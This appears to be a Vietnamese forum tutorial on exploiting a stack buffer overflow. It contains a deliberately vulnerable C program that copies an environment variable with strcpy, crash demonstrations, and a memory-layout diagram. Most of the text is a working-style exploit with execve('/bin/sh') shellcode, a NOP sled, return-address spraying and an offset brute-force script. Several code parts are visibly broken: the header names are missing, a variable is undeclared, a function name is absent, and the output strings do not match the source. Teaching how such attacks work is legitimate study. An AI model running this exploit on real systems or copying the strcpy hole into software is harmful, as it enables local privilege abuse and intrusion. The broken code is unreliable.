Mã:
/* Vuln.c to demonstration buffer overflow
*/
#include
#include
#include
int main()
{
char buffer[512];
char *buff;
if(getenv("EGG") == 0)
{
printf("No environment found!\n");
printf("Aborting!\n");
exit(0);
}
buff = getenv("EGG");
strcpy(buffer, buf2);
printf("Using environemtn: %s\n", buff);
return 0;
}
Trích dẫn:
| bt buffer_overflow # ./vuln No environment found! Aborting! |
Mã:
bt buffer_overflow # export EGG="1234567890"
bt buffer_overflow # ./vuln
Using enviromental string: 1234567890
Mã:
bt buffer_overflow # export EGG=`perl -e 'print "A"x628'`
bt buffer_overflow # ./vuln
Using enviromental string: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
Mã:
bt buffer_overflow # ulimit -c unlimited
Mã:
bt buffer_overflow # ./vuln
Using enviromental string: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
[################################][EBP][EIP][######]
Sau khi làm tràn :
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA][AAAA][AAAA][AAAAAAA]
Mục tiêu của chúng ta :
[NNNNNNNSSSSSSSSSSSSSSRRRRRRRRRRR][R][R][RRRRRRR]
N: Nop
S: shellcode
R: return address .
Mã:
#include
#include
#define OFFSET 0
#define BUFFER_SIZE 628
#define NOP 0x90
{
__asm__("movl %esp,%eax");
}
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main(int argc,char * argv[])
{
char *buffer;
char *buffer_ptr;
long *addr_ret_ptr;
long addr;
int size_buf = BUFFER_SIZE;
int offset = OFFSET;
if(argc > 1) { size_buf = atoi(argv[1]); }
if(argc > 2) { offset = atoi(argv[2]); }
if(!(buffer = malloc(size_buf)))
{
printf("Unable to allocate memory.\n");
exit(0);
}
addr = esp() - offset;
buffer_ptr = buffer;
addr_ret_ptr = (long *) buffer_ptr;
int i ;
for(i = 0; i < size_buf; i+=4) { *(addr_ret_ptr++) = addr; }
for(i = 0; i < size_buf / 2; i++) { buffer[i] = NOP; }
buffer_ptr = buffer + ((size_buf/2) - (strlen(shellcode)/2));
for(i = 0; i < strlen(shellcode); i++) { *(buffer_ptr++) =shellcode[i]; }
buffer[size_buf - 1] = '\0';
memcpy(buffer, "EGG=", 4);
putenv(buffer);
system("./vuln");
return 0;
} 
Mã:
#!/bin/sh
OFFSET=1
while test $OFFSET -lt 10000
do
./expl 628 $OFFSET
OFFSET=`expr $OFFSET + 1`
done